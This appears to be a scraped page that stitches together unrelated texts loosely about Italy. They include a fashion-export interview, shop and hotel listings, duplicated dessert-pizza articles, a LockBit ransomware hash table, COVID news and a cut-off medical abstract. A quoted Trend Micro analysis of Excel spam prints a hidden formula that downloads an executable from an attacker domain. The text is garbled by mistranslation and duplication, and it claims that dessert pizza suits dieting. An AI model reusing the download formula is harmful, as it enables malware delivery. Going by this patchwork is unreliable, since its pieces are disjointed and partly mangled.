25.10.2021

Италия тренд: Модная итальянская одежда и обувь

Содержание

Итальянские производители ощущают позитивный тренд в РФ

Итальянские модные бренды настроены позитивно в плане дальнейшего развития в России. Россияне уже давно ценят итальянский стиль и качество, а кризис — это временно, заявили FashionUnited в EMI — Ente Moda Italia – организации, способствующей продвижению итальянской моды на международных площадках. Бывали времена получше, но российский рынок начинает постепенно восстанавливаться, отметили представители ассоциации.

Каково сегодня положение итальянских модных брендов в России?

На самом деле мы настроены оптимистично, конечно, есть некоторая осторожность, но при этом мы видим явные сигналы того, что российский рынок восстанавливается.

По информации SMI (Sistema moda Italia), за 1 квартал 2016 года Италия экспортировала в Россию модной продукции на сумму 253,5 млн евро (269,4 млн евро годом ранее). Падение есть, но не столь резкое. (Италия смогла сократить свои драматические экспортные потери в России с 30 проц до 6 проц за 1 квартал этого года, заявил в начале сентября Райнхард Дёпфер, управляющий партнер ITMM GmbH — примечание редакции

). Продажи итальянской модной одежды и аксессуаров в России в июне 2016 года выросли на 13,3 проц.

На последней выставке CPM мы получили позитивную реакцию от байеров, их было много. Конечно, более определённо о результатах выставки можно будет говорить чуть позже. Но мы очень довольны нашими достижениями.

Сколько экспонентов из Италии приняло участие в сентябрьской выставке CPM? Насколько серьезно снизилось количество итальянских компаний?

В минувшем сентябре на выставке CPM было показано 94 коллекции одежды, аксессуаров, нижнего белья и пляжной одежды из Италии сезона Spring/Summer 2017 (для сравнения: в 2014 году на CPM приехали представители 283 итальянских компаний — примечание редакции). Бренды были представлены в различных павильонах и разделах: CPM, CPM Kids, Mode Lingerie and Swim Moscow. В феврале 2016 года итальянских марок было больше — свыше 140, но в зимой выставка CPM всегда бывает масштабнее — это более сильный сезон, участвуют компании — производители меховых изделий, трикотажа и верхней одежды. В любом случае, Россия остаётся важным рынком для Италии.

*​*

Итальянский павильон исторически является одним из самых больших среди международных разделов на CPM. Ente Moda Italia подтверждает, что инвестиции в продвижение итальянских делегаций на российском рынке будут продолжаться. В числе стратегических активностей на прошедшей CPM — важный рекламный проект, реализованный EMI совместно с SMI – Sistema Moda Italia при поддержке Министерства экономического развития Италии и в коллаборации с московским офисом агентства ICE.

Конечно, количество итальянских экспонентов в сентябре на московской выставке уменьшилось в связи с трудной ситуацией и нестабильными курсами валют. Но обстановка постепенно стабилизируется, итальянские производители ощущают позитивный тренд и по-прежнему верят в важность российского рынка. Поэтому, как и в предыдущие сезоны, у нас появились новые участники — компании, которые приехали в Москву впервые.

Как оценивают российский рынок итальянские бизнесмены, что они говорят о перспективах здесь?

*​*

Российский рынок очень дорог итальянским компаниям — экспортерам одежды. Да, сейчас работать сложнее, чем в предыдущие 5-7 лет, но Россия остаётся важнейшим рынком для итальянского модного бизнеса в силу своих структурных особенностей. По этой причине нам важно сохранить наше присутствие здесь. Участие в CPM — это важный момент для наших малых и средних предприятий, да и бренда Made in Italy в целом. Без сомнений, ситуация в будущем станет более позитивной, поскольку итальянские модные бренды очень внимательны к российским потребителям, которые на самом деле не так просты. При этом россияне уже давно ценят итальянский стиль и качество.

Какие настроения сейчас у итальянских компаний в целом?

Настроения, безусловно, более позитивные, чем в прошлом году. И мы верим, что в будущем будет только лучше.

Фото: EMI — Ente Moda Italia

Подвесной светильник VG New Trend 7511845.00 (Италия) по лучшей цене

Технические характеристики

Страна Италия
Производитель VG New Trend
Коллекция Pipe
Артикул 7511845.00
Ширина 700 мм
Длина 1400 мм
Тип лампы Led
Степень защиты
IP20 
Диммер Да
Цвет арматуры Золото 24к
Материал арматуры Металл
Цвет плафона Прозрачный. золото 24к
Материал плафонов Муранское стекло
Форма Прямоугольная
Тип крепления
На планку
Направление рожков Вниз
Код товара 140-455-693

Люстры и подвесы VG New Trend 7511845.00 (Италия) — оригинальная модель от производителя VG New Trend из коллекции Pipe. Покупайте произведение дизайнерского искусства из качественных материалов: Металл по выгодной цене: 1315440
Добавляйте товар в корзину, а менеджеры интернет магазина Wonder Light ответят на все вопросы и помогут оформить заказ онлайн. Осуществляем доставку по всем регионам России.

Подвесной светильник VG New Trend 7511845.00

1315440 RUB In stock

Описание: Подвесной светильник VG New Trend 7511845.00 производства Италия — продажа в интернет-магазине, описание, фото, цена, характеристики и отзывы

Trend Hotel Villa Paola бронировать отель

Trend Hotel Villa Paola бронировать отель — Римини, 3*, Италия
  • Рекомендуем
  • Лучшая цена
  • Отель дня
  • Акция — 5%
  • Категория3*
  • РегионРимини

Расположенный в Римини, этот гостеприимный отель всегда рад гостям. Ближайший общественный транспорт находится на расстоянии 6. 5 километра(ов) от отеля. Путешественники могут воспользоваться ближайшим аэропортом, расположенным на расстоянии 12. 0 километра(ов). Благодаря небольшому количеству номеров, — их всего 5 — эта гостиница очень удобна для желающих пожить в тихой атмосфере. Во всех местах общего пользования и жилых единицах этого отеля есть беспроводное Интернет-соединение. Стойка регистрации работает с перерывами. Эта гостиница не предлагает кроватки по запросу. Проживание с домашними животными здесь не разрешается. Кроме того, для обеспечения дополнительного удобства гостей существует автомобильная парковка.

Location

  • Общее количество номеров — 5
  • Подключение номера

Room facilities (Standard room)

  • Площадь номера (кв.м.) — 14
  • Количество спален — 1
  • Ванная комната — 1
  • Ванная для инвалидов
  • Фен
  • Набор для ванной
  • беспроводной доступ в Интернет
  • Подключение к интернету
  • Прямой телефон
  • Телевизор
  • Имеется доступ для инвалидной коляски
  • Номера для курящих
  • Дополнительные кровати по запросу
  • Детская кроватка по запросу

Distances (in meters)

  • Автобусная остановка — 6500 m
  • аэропорт — 12000 m

Points of interest

  • Museo della Marineria — 11300 m
  • Fiabilandia — 10900 m
  • Italia in Miniatura — 1700 m
  • Aquafan — 17000 m
  • Viale Ceccarini — 16200 m

Facilities

  • Допускаются домашние животные весом до 5 кг.
  • Допускаются домашние животные весом свыше 5 кг.
  • Имеется доступ для инвалидной коляски
  • Парковка
  • Гараж
  • Стойка размещения 24 часа
  • Заезд — 13:00 — 00:00
  • Время сдачи — 07:30 — 11:00
  • Беспроводное подключение к интернету
  • беспроводной доступ в Интернет

Entertainment

  • Открытый бассейн с пресной водой — 1
  • Шезлонги

Пользуясь сайтом, Вы соглашаетесь на использование cookie-файлов

×

Excel Files with Hidden Sheets Target Users in Italy — Новости о безопасности

Insights and analysis by Matthew John Camacho

A spam campaign using emails that have Excel file (.xls) attachments (detected by Trend Micro as Trojan.XF.HIDDBOOK.THDBHBO) has been seen circulating and targeting users in Italy and some users in Germany and other countries. The attachment appears blank when opened, but it has a sheet set to “hidden” that attempts to connect to a URL and download a file. Setting sheets to hidden is a documented feature. Some of the subjects of the spam emails written in Italian involve topics such as the availability of a free service, correcting information, invoice details, order completion, and service assistance. The sample shown below informs the receiver that their order has been completed, and comes with the attachment “fattura_10.xls.” Fattura is an Italian word that means invoice.

Figure 1. Sample Italian email propagating .xls attachments with hidden sheets


Figure 2. Opened .xls attachment

Upon downloading and opening the attachment, a prompt to “Enable Content” appears. At first glance, the Excel file appears empty. Once enabled, the file will attempt to connect to a URL and download another file through the formula “=FORMULA(“hxxp://gstat.dondyablo[.]com/fattura.exe”, $BB$54”. Note that the hidden sheet still won’t show itself even after enabling the content.

 
Figure 3. Hidden formula in the .xls file

The hidden sheet can be manually unhidden, as it is only set to hidden and not to “very hidden.” Very hidden sheets are not accessible via the Excel user interface unless another tool is used. Hidden sheets and formulas can be used to potentially download malicious files and connect to suspicious domains, opening more possibilities for the threat actors.

Figure 4. Unhiding the hidden sheet

We recently saw a similar campaign using a malicious Microsoft Excel 4.0 Macro sheet with a suspicious formula that is set to “very hidden.” It was also propagated through spam emails.

Defense against spam

Spam email is one of the vehicles cybercriminals use to spread malicious files. Users can defend against these types of threats with the following best practices:

  • Be wary of downloading attachments or clicking links in emails coming from unfamiliar sources. Hover the pointer over a link to check the link’s URL.
  • Check the email address of the sender. If it is unfamiliar or is not linked to a reputed organization, it is best not to perform any action related to the email.
  • Watch out for grammatical errors and misspellings in the email body. Emails from legitimate companies are usually well-constructed.
  • Keep email addresses and other personal information private. This lessens the chances of receiving spam emails.

Security solutions can also help safeguard against spam and other email-based threats:


Indicators of Compromise

For the list of IoCs, please refer to this document.

HIDE

Like it? Add this infographic to your site:
1. Click on the box below.   2. Press Ctrl+A to select all.   3. Press Ctrl+C to copy.   4. Paste the code into your page (Ctrl+V).

Image will appear the same size as you see above.

Опубликовано в Cybercrime & Digital Threats

Десертная пицца — кулинарный тренд итальянской кухни!

Пицца, многоликая и разнообразная, родившись когда-то в солнечной теплой Италии, быстро завоевала весь мир и стала всенародной любимицей. Большинство жителей земли, вне зависимости от национальной и религиозной, профессиональной, половой и возрастной принадлежности, с удовольствием уплетают это сытное, вкусное, хрустящее горячей корочкой блюдо и знают тайные места, где лучше заказать пиццу. Каковы бы ни были ваши гастрономические пристрастия, эта синьора без труда угодит и вам, ведь набор её начинок бесконечно разнообразен. Мясо и птица, рыба, бекон и ветчина, чудесные морепродукты и грибы, сыр и сотни видов овощей: от помидоров до спаржи, а также: ананасы, киви и яблоки, оливки и бог знает что ещё.

Готовят чудо-блюдо в каждом государстве, да и в каждой пиццерии по-разному. В печи и на углях, а кое-кто даже – на сковороде и в микроволновке. Даже ленивый найдет вариант приготовления легкий, быстрый и нетрудозатратный! Тем, кто вовсе готовить не умеет и не желает, лучшей подружкой станет пицца по акции.

История происхождения блюда

Как мы уже заметили, колыбелью пиццы стала чудесная, наполненная древними развалинами и средневековой роскошью Италия. Изначально это было бедняцкое блюдо, которое остроумные и экономные домохозяйки пекли из всяческих остатков, без дела валявшихся в кухне. Сегодня же местные cuisiniers – просто магистры кулинарии – мгновенно приготовят из ординарного продуктового набора нечто совершенно невероятное. Итальянская пицца – это поистине высокая классика мировой кухни.

Все уверены, что круглая лепешка из теста, нашпигованная всякой всячиной – идеальное основное блюдо, подаваемое к обеду или ужину. Люди, привыкшие к плотному завтраку, могут и утречком пиццей подкрепиться. Но с чем точно не ассоциируется это блюдо – так это с десертом. А вот и зря! Потому что в Италии последним гастрономическим трендом как раз и стала «пицца десертная». С некоторых пор это — изюминка итальянской национальной кухни. Впервые этот деликатесный изыск был приготовлен не столь давно – уже в текущем, 21 столетии – во время очередного ежегодного общеитальянского чемпионата пиццеристов. Не очень-то радушно встретили консерваторы-итальянцы эту сомнительную новинку. Но вскоре десертная пицца очаровала и покорила всех, от сладкоежек-малышей до взрослых мужчин — заядлых футбольных болельщиков. На том чемпионате именно она получила первый приз.

Отличительные черты десертной пиццы

Чем же эта пицца характеризуется? Какова рецептура? Из чего – начинка? В десертную пиццу кладут всяческие сласти, свежие фрукты, ягоды и всевозможные сиропы-ликеры. Все это роскошество приносит сладкий и терпкий вкус, нежный тонкий аромат.

Процесс приготовления десерта креативен и до сих пор находятся в непрестанном развитии. Каждый повар что-то свое, личное в него привносит. Отсюда – такое разнообразие вкусов, цветов, размеров и форм.

Взяв на себя нелегкий труд сравнения привычной нам пиццы с кулинарной новинкой, сообщим, что общим окажется лишь принцип приготовления обоих блюд. Есть некое тесто (разного состава), а также – различные начинки. Принципиальное различие их в том, что в тесто добавляют сахар, а вместо соусов (кетчупов и майонезов) используют фруктовый сироп, йогурт и творожную массу. Десертная пицца поражает не только непривычным вкусом, но и способом приготовления. Создание этого блюда – возможность весело поэкспериментировать, проявить богатую кулинарную фантазию.

Кроме общеизвестных правил и рецептов у пиццеристов существуют и некоторые секреты, таинственные, тщательно охраняемые ноу-хау. К примеру, если в десертную пиццу нужно положить фрукты, то следует знать, меняют ли эти фрукты свои вкусовые свойства и меняются ли они внешне при запекании. Если фрукты остаются по вкусу и виду прежними, их можно выложить на пиццу перед запеканием, ну а если при высокой температуре свойства и вид меняются — стоит их выложить уже после приготовления — в качестве украшения.

Сочетая, казалось бы, «несочетаемые» начинки, можно достичь необычного редкого вкуса. Когда десертная пицца уже готова, а ягоды и фрукты старательно уложены, можно залить их шоколадом, ликером или сиропом, «поснежить» сахарной пудрой.

Ешь – и худеешь!

Очень важно для современных «продвинутых» граждан, тщательно следящих за здоровьем и фигурой, то, что десертной пиццей можно баловать себя и сидя на диете. Ягоды-фрукты, а также творог легко усваиваются организмом, содержат множество необходимых витаминов и микроэлементов.

Год от года вкуснейшая и очень полезная десертная пицца привлекает сердца все большего числа поклонников. Она популярна в большинстве стран мира. Сомнений нет: вскоре пицца десертная догонит и перегонит свою сытную и калорийную прародительницу!

Доставка пиццы по Риге и Юрмале. Заказав пиццу, вы избежите долгой готовки, при этом сможете поесть свое любимое блюдо — хрустящую горячую пиццу с разнообразными начинками.

Десертная пицца — кулинарный тренд итальянской кухни

Пицца, аппетитная и разнообразная, появившись когда-то в солнечной Италии, быстро стала всенародной любимицей. Люди разных стран обожают это сытное, вкусное, хрустящее с горячей корочкой блюдо и знают тайные места, где лучше заказать пиццу. Каковы бы ни были ваши гастрономические пристрастия, вы без труда выберите ту пиццу, которая станет идеальной именно для вас. Самые разные ингредиенты могут стать начинкой для пиццы:

  • Мясо;
  • Птица;
  • Рыба;
  • Бекон; 
  • Ветчина;
  • Морепродукты;
  • Грибы;
  • Сыр;
  • Овощи: от помидоров до спаржи; 
  • Ананасы;
  • Киви;  
  • Яблоки; 
  • Оливки. 

Готовят чудо-блюдо в каждой стране, да и в каждой пиццерии по-разному. В печи и на углях, а кое-кто даже – на сковороде и в микроволновке. Даже ленивый найдет легкий и быстрый вариант приготовления. Тем, кто вовсе готовить не умеет и не желает тратить время на кухне, лучшим вариантом станет пицца по акции, которую можно заказать в ресторанах ТОКИО-CITY. 

История происхождения блюда

Страной, где впервые приготовили пиццу, стала чудесная, с богатой историей и по-средневековому роскошная Италия. Изначально это было блюдо бедняков, которое остроумные и экономные домохозяйки пекли из всяких съестных остатков, без дела валявшихся в кухне. Сегодня же местные cuisiniers – магистры кулинарии – мгновенно приготовят из ординарного продуктового набора нечто совершенно невероятное. Итальянская пицца – это действительно высокая классика мировой кухни.

Все уверены, что круглая лепешка из теста, нашпигованная всякой всячиной – идеальное основное блюдо, подаваемое к обеду или ужину. Люди, привыкшие к плотному завтраку, могут подкрепиться пиццей и утром. Но с чем точно не ассоциируется это блюдо – так это с десертом. А вот и зря. Дело в том, что в Италии последним гастрономическим трендом как раз и стала пицца десертная. С некоторых пор это изюминка итальянской национальной кухни. Впервые этот деликатесный изыск был приготовлен не столь давно – в XXI столетии – во время очередного ежегодного итальянского чемпионата пиццайоло. Не очень-то радушно встретили консерваторы-итальянцы эту сомнительную новинку. Но вскоре десертная пицца очаровала и покорила всех, от сладкоежек до вегетарианцев. На том чемпионате именно сладкая пицца получила первый приз.

Отличительные черты десертной пиццы

Чем же эта пицца характеризуется? Какова ее рецептура? Из чего готовится начинка? В десертную пиццу кладут:

  • разные сладости; 
  • свежие фрукты;
  • ягоды; 
  • сиропы-ликеры. 

Все это многообразие приносит сладкий и терпкий вкус, нежный тонкий аромат. Процесс приготовления десерта является творческим и до сих пор находится в непрестанном развитии. Каждый повар привносит в него что-то свое. Отсюда – такое разнообразие вкусов, цветов, размеров и форм.

Взяв на себя нелегкий труд сравнения привычной нам пиццы с кулинарной новинкой, сообщим, что общим окажется лишь принцип приготовления обоих блюд. Есть тесто, правда разного состава, а также – различные начинки. Принципиальное различие их в том, что в тесто для сладкой пиццы добавляют сахар, а вместо соусов, кетчупов и майонезов, используют фруктовый сироп, йогурт и творожную массу. Десертная пицца поражает не только непривычным вкусом, но и способом приготовления. Создание этого блюда – возможность весело поэкспериментировать и проявить кулинарную фантазию.

Секреты десертной пиццы

Кроме общеизвестных правил и рецептов у пиццайоло существуют и некоторые секреты, тщательно охраняемые ноу-хау. К примеру, если в десертную пиццу нужно положить фрукты, то следует знать, меняют ли эти фрукты свои вкусовые свойства и меняются ли они внешне при запекании. Если фрукты сохраняют свой вкус и вид, их можно выложить на пиццу перед запеканием. А вот если при высокой температуре свойства и вид меняются, стоит выложить начинку уже после приготовления пиццы в качестве украшения.

Сочетая, казалось бы, несочетаемые начинки, можно достичь необычного и редкого вкуса. Когда десертная пицца уже готова, а ягоды и фрукты старательно уложены, можно залить их шоколадом, ликером или сиропом или присыпать сахарной пудрой.

Ешь – и худеешь!

Для тех, кто тщательно следит за своим здоровьем и фигурой, важно то, что десертной пиццей можно баловать себя и сидя на диете. Ягоды-фрукты, а также творог легко усваиваются организмом, содержат множество необходимых витаминов и микроэлементов. Год от года вкусная и очень полезная десертная пицца привлекает к себе все большее число поклонников. Она популярна в большинстве стран мира. Сомнений нет: вскоре пицца десертная догонит и перегонит свою сытную и калорийную прародительницу.

Доставка пиццы по Красногвардейскому району и в другие районы Санкт-Петербурга действует в ресторанах ТОКИО-CITY. Заказав пиццу, вы избежите долгого стояния у плиты, при этом сможете отлично провести время и насладиться своим любимым блюдом – хрустящей горячей пиццей с разнообразными начинками.

Мебельная фурнитура и комплектующие для мебели MAKMART

MAKMART – крупнейший дистрибьютор мебельной фурнитуры, комплектующих и аксессуаров для изготовления мебели. Более 20 лет наша компания поставляет товары для фабрик, производящих кухонные гарнитуры и мебель для спален, детских, гостиных и прихожих. Мы дорожим своей репутацией и предлагаем продукцию, отвечающую самым высоким техническим и эстетическим требованиям.

Наш интернет-магазин – это всё необходимое для производства мебели для дома и офиса: от элементов крепежа до сложных систем трансформации. В нем Вы можете приобрести фурнитуру, комплектующие, материалы, механизмы и аксессуары для производства кухонь, шкафов, мебели для ванных комнат и гардеробных.

Мы работаем с крупными фабриками, мебельными производствами любого масштаба, дизайн-студиями и мастерскими, а также частными лицами. Наша компания – многолетний надёжный партнёр большинства крупных российских мебельных фабрик.

Мы предлагаем самый большой ассортимент продукции для мебельщиков, мощную складскую программу и профессиональный сервис. Для многих наших клиентов MAKMART — синоним высокого качества и стабильности.

Миссия MAKMART — содействие отечественному производителю в создании оригинальной, качественной и современной мебели. Мы стремимся к повышению конкурентных позиций российской мебели на мировом рынке.

MAKMART – качество, в котором не приходится сомневаться

С 1997 года MAKMART обеспечивает бесперебойные поставки комплектующих для мебели из Европы. Мы тщательно отслеживаем тенденции рынка, посещаем международные выставки, отбираем лучших поставщиков и привозим новинки в Россию, часто на условиях эксклюзивного дистрибьюторского договора.

Собственный парк автомобилей, отлаженная система логистики и сеть складских комплексов позволяют нам поддерживать актуальные складские запасы и всегда предлагать лучшие решения для наших клиентов.

Складская программа MAKMART насчитывает более 15 000 наименований продукции и более 50 товарных групп. Отбираем лучших поставщиков для Вас. Это более 120 фабрик-производителей из Европы: Италия, Германия, Испания, Соединённое Королевство, Австрия, Польша и др., а также России и Юго-Восточной Азии.

Только проверенные бренды с безупречной репутацией: SALICE, CAMAR, INOXA, CITTERIO GIULIO, FURNIPART, GIUSTI, FAB GROUP, SERVETTO, GOLLINUCCI, DOMUS LINE и др.

Мы работаем по всей России, а также в Казахстане и Республике Беларусь. Центральный офис в Москве, широкая сеть филиалов и дилерских компаний позволяют нам обеспечивать лучшей фурнитурой мебельные предприятия по всей стране.

Наши преимущества:
  • Огромный выбор фурнитуры, аксессуаров и кухонных принадлежностей, который постоянно пополняется
  • Удобно структурированный каталог с полной технической информацией и профессиональными иллюстрациями
  • Товары в наличии благодаря обширной складской программе
  • Только проверенные бренды и сертифицированные товары высокого качества
  • Доставка во все регионы России
  • Обширная сеть филиалов и дилеров, шоу-румы и склады в крупных городах РФ и Ближнего Зарубежья
  • Профессиональные консультации и сервисы для мебельщиков

Если вам нужно купить мебельную фурнитуру, механизмы, аксессуары, — на нашем сайте вы найдёте всё необходимое. Вы можете выбрать товары и оформить заказ онлайн или позвонить в отдел продаж: менеджеры проконсультируют вас, примут заказ и оформят доставку удобным для вас способом. Мы поможем подобрать комплектующие для мебели под ваши задачи.

LockBit выходит на поверхность с обнаружением программ-вымогателей версии 2.0 в Чили, Италии, Тайване, Великобритании

SHA-256 Имя файла
Обнаружение
0545f842ca2eb77bcac0fd17d6d0a8c607d7dbc8669709f3096e5c1828e1c049 Выкуп.Win32.LOCKBIT.YXBHJ-T
0906a0b27f59b6db2a2451a0e0aabf292818e32ddd5404d08bf49c601a466744
Ransom.Win32.LOCKBIT.SMYEBGW
21879b5a8a84c5fe5e009c85744caf74b817c57203020bf919037d7ccb6b6a58 Выкуп.Win32.LOCKBIT.SMCET
255f8465962bedaf7a373da5f721aecbc1d6027ca2e4256c6c4352f2de179ca0

Restore-My-Files.txt

Ransom.Win32.LOCKBIT.ENE.note

4db47caf8d93e855b8364def67d3d3282fc964dc4684df6bbe172ea6e902e6fe
7b64ca8fe1cace0744a28f43961f17f8ea51910a54d6629502bfb9f3f3e5f831
8c0e4a6fd28f94fa17a96f6e424b122f5d1216b230a33c6dff5dbf6654d0721c
a05ed65787b390ba33b04b4b99c3810cbaf684b37f8839e57db8316e6f01af31 Выкуп.Win32.LOCKBIT.O.note
a26250b8d2431b497400c8a754285a6259a81a31ae629ee25331f6030b34e543 Ransom.Win32.LOCKBIT.ENH.note
b09a92dedbcb8d5faed6fcc2194ebaa24da601376b47e1edf705519a7860964e Ransom.Win32.LOCKBIT.N.note
bea7aed0dfbf7ce7491d7c8cfed35a2e626fbd345bb7425a34dae6f5894629b1 Ransom.Win32.LOCKBIT.ENH.note
cb29c6fbd085407e0e8a58e7cd6512c8c5dfa06f88fdeeb9a66d025fdfc6dd32
f03584ecdee29e63dee1b7bf2347f605d1e1d6379a8f55e9a85c6a329bf3967b Выкуп.Win32.LOCKBIT.ENG.note
28042dd4a92a0033b8f1d419b9e989c5b8e32d1d2d881f5c8251d58ce35b9063 ph.exe PUA.Win32.ProcHack.A
3407f26b3d69f1dfce76782fee1256274cf92f744c65aa1ff2d3eaaaf61b0b1d StealBit.exe.dangerousFile TrojanSpy.Win32.STEALBIT.YXBHM
4bb152c96ba9e25f293bbc03c607918a4452231087053a8cb1a8accb1acc92fd Ransom.Win32.LOCKBIT.YXBHC-TH
4edbf2358a9820e030136dc76126c20cc38159df0d8d7b13d30b1c9351e8b277
bcbb1e388759eea5c1fbb4f35c29b6f66f3f4ca4c715bab35c8fc56dcf3fa621
dd8fe3966ab4d2d6215c63b3ac7abf4673d9c19f2d9f35a6bf247922c642ec2d
4db7eeed852946803c16373a085c1bb5f79b60d2122d6fc9a2703714cdd9dac0 образца.exe TrojanSpy.Win32.STEALBIT.YXBHM
6876eef67648a3797987745617b9fdfb31a703b7809e7f12bb52c6386e185917 CryptNN.exe Ransom.Win32.LOCKBIT.ENC
717585e9605ac2a971b7c7537e6e311bab9db02ecc6451e0efada9b2ff38b474 Выкуп.Победа32.LOCKBIT.YXBHC-TH
73406e0e7882addf0f810d3bc0e386fd5fd2dd441c895095f4125bb236ae7345 Ransom.Win32.LOCKBIT.SMYEBGW
7b5db447f6c29c939f5e0aae1b16431a132db5a2ab4420ba9818af2bf4496d21 psdelsvc.bat Trojan.BAT.KILLPROC.D
aae5e59d6424515c157f3c4a54e4feeb09759d028290ab0271f730e82f58f10f delsvc.bat
94e6b969c100483970fc3985bf2b173f2f24d796a079114f584f42484840be28 AV.bat Trojan.BAT.KILLAV.WLDX
a398c70a2b3bf8ae8b5ceddf53fcf6daa2b68af2fadb76a8ea6e33b8bbe06f65 defoff.летучая мышь
98e4c248377b5b62121c7b9ef20fc03df3473cbd886a059998f4210e8df07f15 pchunter64.exe PUA.Win32.PCHunter.E
a7591e4a248c04547579f014c94d7d30aa16a01bb2a25b77df36e30a198df108 Выкуп.Победа32.LOCKBIT.YXBHC-TH
acad2d9b291b5a9662aa1469f96995dc547a45e391af9c7fa24f5921b0128b2c Выкуп.Win32.LOCKBIT.YXBHJ-T
b3faf5d8cbc3c75d4c3897851fdaf8d7a4bd774966b4c25e0e4617546109aed5 Выкуп.Win32.LOCKBIT.SMYEBGW
bd14872dd9fdead89fc074fdc5832caea4ceac02983ec41f814278130b3f943e StealBit.exe TrojanSpy.Win32.STEALBIT.YXBHM
d089d57b8b2b32ee9816338e96680127babc5d08a03150740a8459c29ab3ba78 Ransom.Win32.LOCKBIT.YEBGW
d089d57b8b2b32ee9816338e96680127babc5d08a03150740a8459c29ab3ba78 LockBIT_7D68A5BFD028A31F.exe Ransom.Win32.LOCKBIT.ЯБГВ
f32e9fb8b1ea73f0a71f3edaebb7f2b242e72d2a4826d6b2744ad3d830671202 Ransom.Win32.LOCKBIT.M

• COVID-19 и тенденция мобильности в розничной торговле и отдыхе Италия 2021

• COVID-19 и тенденция мобильности в розничной торговле и отдыхе Италия 2021 | Statista

Другая статистика по теме

Пожалуйста, создайте учетную запись сотрудника, чтобы иметь возможность отмечать статистику как избранную.Затем вы можете получить доступ к своей любимой статистике через звездочку в заголовке.

Зарегистрируйтесь сейчас

Пожалуйста, авторизуйтесь, перейдя в «Моя учетная запись» → «Администрирование». После этого вы сможете отмечать статистику как избранную и использовать персональные статистические оповещения.

Аутентифицировать

Базовая учетная запись

Познакомьтесь с платформой

У вас есть доступ только к базовой статистике.

Единая учетная запись

Идеальная учетная запись начального уровня для индивидуальных пользователей

  • Мгновенный доступ к статистике 1 м
  • Скачать в форматах XLS, PDF и PNG
  • Подробные ссылок

$ 59 39 $ / месяц *

в первые 12 месяцев

Корпоративный аккаунт

Полный доступ

Корпоративное решение, включающее все функции.

* Цены не включают налог с продаж.

Самая важная статистика

Самая важная статистика

Самая важная статистика

Дополнительная статистика

Узнайте больше о том, как Statista может поддержать ваш бизнес.

Google. (21 августа 2021 г.). Процентное изменение посещаемости объектов розничной торговли и отдыха мобильными пользователями во время пандемии коронавируса (COVID-19) в Италии с марта 2020 года по август 2021 года в разбивке по регионам [График].В Statista. Получено 19 сентября 2021 г. с https://www.statista.com/statistics/1109402/mobility-trend-in-retail-and-recreation-during-coronavirus-italy/

Google. «Процентное изменение посещаемости объектов розничной торговли и отдыха мобильными пользователями во время пандемии коронавируса (COVID-19) в Италии с марта 2020 года по август 2021 года в разбивке по регионам». Диаграмма. 21 августа 2021 года. Statista. По состоянию на 19 сентября 2021 г. https://www.statista.com/statistics/1109402/mobility-trend-in-retail-and-recreation-during-coronavirus-italy/

Google.(2021 г.). Процентное изменение посещаемости объектов розничной торговли и отдыха мобильными пользователями во время пандемии коронавируса (COVID-19) в Италии с марта 2020 года по август 2021 года в разбивке по регионам. Statista. Statista Inc .. Дата обращения: 19 сентября 2021 г. https://www.statista.com/statistics/1109402/mobility-trend-in-retail-and-recreation-during-coronavirus-italy/

Google. «Процентное изменение посещений объектов розничной торговли и мест отдыха мобильными пользователями во время пандемии коронавируса (Covid-19) в Италии с марта 2020 года по август 2021 года по регионам.»Statista, Statista Inc., 21 августа 2021 г., https://www.statista.com/statistics/1109402/mobility-trend-in-retail-and-recreation-during-coronavirus-italy/

Google, изменение в процентах посещения магазинов и мест отдыха мобильными пользователями во время пандемии коронавируса (COVID-19) в Италии с марта 2020 года по август 2021 года, по регионам Statista, https://www.statista.com/statistics/1109402/mobility-trend-in -розница-и-отдых-во время-коронавируса-италия / (последнее посещение — 19 сентября 2021 г.)

Тенденция к пандемии остается стабильной, поскольку Италия начинает вновь открываться — Синьхуа

Люди проходят мимо ресторана в Риме, Италия, 26 апреля 2021 года.Италия сделала первый решительный шаг к постпандемической фазе в понедельник, в первый день открытия на фоне сокращения случаев коронавируса. (Фото Элизы Лингриа / Синьхуа)

РИМ, 26 апреля / Синьхуа / — Италия сделала первый решительный шаг к постпандемической фазе в понедельник, в первый день возобновления работы на фоне сокращения случаев коронавируса.

Рестораны, бары, спортивные сооружения на открытом воздухе и музеи были среди разрешенных к возобновлению деятельности в 14 «желтых» регионах, которые показывают низкий риск заражения на основе местных данных о коронавирусе.

В возобновляемой «дорожной карте» правительства установлен точный график постепенной отмены мер сдерживания с разными сроками для возобновления работы различных ограниченных секторов в период с конца апреля по начало июля.

Министерство здравоохранения страны сообщило в понедельник о 8 444 новых случаях заражения COVID-19, в результате чего общее число случаев заражения превысило 3,9 миллиона случаев.

Также был зарегистрирован 301 новый случай со смертельным исходом, в результате чего общее количество смертей, связанных с коронавирусом, в Италии достигло 119539 человек.По данным министерства, выздоровление увеличилось на 16 539 человек и составило 3,39 миллиона человек.

Также в понедельник премьер-министр Марио Драги подчеркнул важность национального плана обеспечения устойчивости и восстановления стоимостью 248 миллиардов евро (299,8 миллиарда долларов США).

После двухдневного обсуждения в парламенте кабинет министров заявил, что план будет принят, а затем отправлен властям Европейского союза (ЕС) в Брюссель для окончательного рассмотрения в период со среды по пятницу.

В случае утверждения план восстановления будет в основном финансироваться за счет ресурсов ЕС, как это предусмотрено программой Next Generation EU, запущенной в прошлом году.

«Думать о национальном плане обеспечения устойчивости и восстановления как о простом наборе проектов — хотя и необходимых и амбициозных — с указанием цифр, целей и сроков — было бы ошибкой», — сказал Драги.

«В этом наборе программ … заключается, прежде всего, судьба нашей страны».

По данным государственной статистики, на данный момент в Италии было введено около 17,8 миллиона доз вакцины, и 5,2 миллиона человек получили обе прививки.

«Европейская неделя иммунизации (26 апреля — 2 мая) в этом году посвящена вакцинам против COVID-19, что, несомненно, сейчас является приоритетом», — заявил в понедельник глава Национального института здравоохранения Сильвио Брусаферро.

«Тем не менее, крайне важно не оставлять позади другие (программы) плановой иммунизации, потому что это окажет негативное влияние на общественное здоровье еще долго после того, как пандемия коронавируса закончится». Enditem

Общенациональное исследование, Италия, 2001–2010 гг.

Аннотация

Фон

Мы исследовали временные тенденции и географические различия как в госпитализации, так и в госпитальной смертности от острых диабетических осложнений (ADC) в итальянской универсальной системе здравоохранения.

Методы и результаты

